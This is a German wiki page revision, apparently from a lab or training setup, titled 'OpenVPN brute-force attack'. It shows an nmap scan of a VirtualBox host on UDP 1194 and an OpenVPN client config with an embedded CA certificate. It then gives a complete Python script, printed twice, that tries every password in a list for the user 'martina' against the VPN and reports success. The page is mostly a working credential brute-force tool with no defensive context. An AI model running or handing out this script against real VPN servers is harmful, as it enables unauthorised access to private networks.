Openvpn Bruteforce Attacke: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Rechner Scannen= *sudo nmap -sU 192.168.15.89 -p 1194 Starting Nmap 7.95SVN ( https://nmap.org ) at 2025-08-08 13:31 CEST Nmap scan report for 192.168.15.89…“) |
|||
| Zeile 54: | Zeile 54: | ||
-----END CERTIFICATE----- | -----END CERTIFICATE----- | ||
</ca> | </ca> | ||
| + | </pre> | ||
| + | ==Die Brute Force Python Datei== | ||
| + | <pre> | ||
| + | import subprocess | ||
| + | |||
| + | user = "martina" | ||
| + | passlist = "bad-passwords" | ||
| + | config = "client.ovpn" | ||
| + | credfile = "vpn-cred.txt" | ||
| + | |||
| + | with open(passlist, "r") as f: | ||
| + | for pw in f: | ||
| + | pw = pw.strip() | ||
| + | print(f"[+] Teste: {user}:{pw}") | ||
| + | |||
| + | # Schreibe Login-Datei | ||
| + | with open(credfile, "w") as cred: | ||
| + | cred.write(f"{user}\n{pw}\n") | ||
| + | |||
| + | try: | ||
| + | result = subprocess.run( | ||
| + | ["sudo", "openvpn", "--config", config, "--auth-user-pass", credfile, "--connect-retry-max", "1", "--connect-timeout", "5"], | ||
| + | stdout=subprocess.PIPE, | ||
| + | stderr=subprocess.STDOUT, | ||
| + | timeout=15 | ||
| + | ) | ||
| + | |||
| + | output = result.stdout.decode(errors="ignore") | ||
| + | |||
| + | # Erfolgsmeldung: Tunnel aufgebaut | ||
| + | if "Initialization Sequence Completed" in output: | ||
| + | print(f"[✔] SUCCESS: {user}:{pw}") | ||
| + | break | ||
| + | elif "AUTH_FAILED" in output: | ||
| + | print("[-] Falsches Passwort") | ||
| + | elif "TLS Error" in output: | ||
| + | print("[!] TLS Error – Verbindung fehlgeschlagen") | ||
| + | else: | ||
| + | print("[?] Unerwartetes Verhalten – Ausgabe folgt:") | ||
| + | print(output) | ||
| + | |||
| + | except subprocess.TimeoutExpired: | ||
| + | # Server schweigt = möglicherweise Erfolg | ||
| + | print(f"[✔] SUCCESS (Timeout statt Auth-Fail): {user}:{pw}") | ||
| + | break | ||
| + | "brute-force.py" 42L, 1410B | ||
</pre> | </pre> | ||
Version vom 8. August 2025, 11:35 Uhr
Rechner Scannen
- sudo nmap -sU 192.168.15.89 -p 1194
Starting Nmap 7.95SVN ( https://nmap.org ) at 2025-08-08 13:31 CEST Nmap scan report for 192.168.15.89 Host is up (0.0010s latency). PORT STATE SERVICE 1194/udp open openvpn MAC Address: 08:00:27:E2:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
Wenn wir das CA-Cert haben?
Erstellen einer client.ovpn
- vi client.ovpn
dev tun0 remote 192.168.15.89 tls-client cipher AES-256-CBC link-mtu 1542 mssfix 1450 pull verb 3 auth-user-pass <ca> -----BEGIN CERTIFICATE----- MIIFAzCCAuugAwIBAgIUQ072ZO1klbIh3U2cUIAhFPaeveIwDQYJKoZIhvcNAQEL BQAwETEPMA0GA1UEAwwGY2EuY3J0MB4XDTI1MDgwODEwMDgxN1oXDTM1MDgwNjEw MDgxN1owETEPMA0GA1UEAwwGY2EuY3J0MIICIjANBgkqhkiG9w0BAQEFAAOCAg8A MIICCgKCAgEAvf4Jcrct+66j/iv4rsv+byEF1fyyWf7c8l5XPQYOFrY7t3DwrZWQ b0TJh30ye1S1DjelWMzH6yiiLR22q5+ynFQLLsktzO7qeN/4NentFnVZ2Dl1mwAl a6yHfQ0NM3tBLvRCRenS4RUjN5Ul2V5bYlDTduayxOe/IPq0CUUb0vIedBBiOQ/X egGImWT4ywQCnshA6IxUvLkdjPrfgw1CtT02UaGWACQl4MgGWmnKBiNkaOXHjELc EdcgXMudjTre5SIweWq1akUoo4ZB2Oxje5hyflcmKyO/1SD3Jdx1F4f7vD3Yzh9n MqCSHT8u3bVSWyib7dlDaWK2NE36OB3N3k4YESrwRzStSCeqs6FEZ/b2g0uUCu0q rnaThFWGhPQHlpqrk/SRczcSmsINvtx1sPjao6GwrhrgSkvmj511fLy6m8HKqYkK 5kF1XJ3MkD7jwFCgLD8+jQFccFavYZClz61921FFxqXIUhKuohcGEhXP11h9fRJG ps2F7SuLKPD76UOr28AG2ZSHv9vJMwYdCudQ6rg1/fed0YfBPy8+du0NCY376g5h qwVDqVILWR2jdsqy7lEKQ7eX21a1AJfOyuio4qYxs49FZkxqWeWM/9+kMi6xRDZf 3gg+qVJa4Ea4u3nRJjJRwmF0/b3Lmt/NZLIRR4P/saJfMjLB+3x5sYkCAwEAAaNT MFEwHQYDVR0OBBYEFP91bPonukY6vGZMtTW68kcY9RMfMB8GA1UdIwQYMBaAFP91 bPonukY6vGZMtTW68kcY9RMfMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL BQADggIBAFKSR57WL7gSHmpg7hpxgXRj2mhMs/RO4rRVl5dhrF++PTFKviJSPvkm YqkdN1fgOoNfIUUB7gz1fGpy02ZqmXJhiB1oBZgfwgByJji/+lGckTY2xqiLPiF/ AGsrd9sc42UuLiJeRjAwJeDqaGkX1XMbIqj0hk1ObLTAJubOpJyVeCIcLzByT1GP QYJpOtZTIcjz/gE9Rs4CgCxrFqC2JHBDqoS6y31xVqq0/btCEYIJKoAkrdyOvs56 1dt1mUeF2vokm0//yK3Y0DMnL1wIppfp6Fyiwm4iQkMyGW/nSN+m7he7clv2fRAo 9yHtcuDn2Vu419QyNzoeM0BvrZ85+mQM1fZ3iEBd938nI20bM0SxHjpCLdKHMhOt 16yGDZcdaAysbXNY7y1tFhAApAldtUyGqvBaNO+t9/UVVYvjRnmeGW2Trn9I2e2r +rbF3SLWkEIeg2Oi1Qd9lzPceOFM7mKcEHtn0eHBhPDt04xYDNX4oFW2VTwOlIdq 9pk3/NXt621W9bpVYkwH9jm8/2mKjzYlMo3hY9jw3df8M8xgSUmo2K198PrPvRnj bfCmi0hoSlDehg76asiX6d+9u/MCu8g0vhWL11lAz8MdqOmBUbos7PFnqMyOs+1u XA3HTJ4T0iayTxjfySXOnsm04Za/j599YMSpRysyWOy48e3SIop9 -----END CERTIFICATE----- </ca>
Die Brute Force Python Datei
import subprocess
user = "martina"
passlist = "bad-passwords"
config = "client.ovpn"
credfile = "vpn-cred.txt"
with open(passlist, "r") as f:
for pw in f:
pw = pw.strip()
print(f"[+] Teste: {user}:{pw}")
# Schreibe Login-Datei
with open(credfile, "w") as cred:
cred.write(f"{user}\n{pw}\n")
try:
result = subprocess.run(
["sudo", "openvpn", "--config", config, "--auth-user-pass", credfile, "--connect-retry-max", "1", "--connect-timeout", "5"],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=15
)
output = result.stdout.decode(errors="ignore")
# Erfolgsmeldung: Tunnel aufgebaut
if "Initialization Sequence Completed" in output:
print(f"[✔] SUCCESS: {user}:{pw}")
break
elif "AUTH_FAILED" in output:
print("[-] Falsches Passwort")
elif "TLS Error" in output:
print("[!] TLS Error – Verbindung fehlgeschlagen")
else:
print("[?] Unerwartetes Verhalten – Ausgabe folgt:")
print(output)
except subprocess.TimeoutExpired:
# Server schweigt = möglicherweise Erfolg
print(f"[✔] SUCCESS (Timeout statt Auth-Fail): {user}:{pw}")
break
"brute-force.py" 42L, 1410B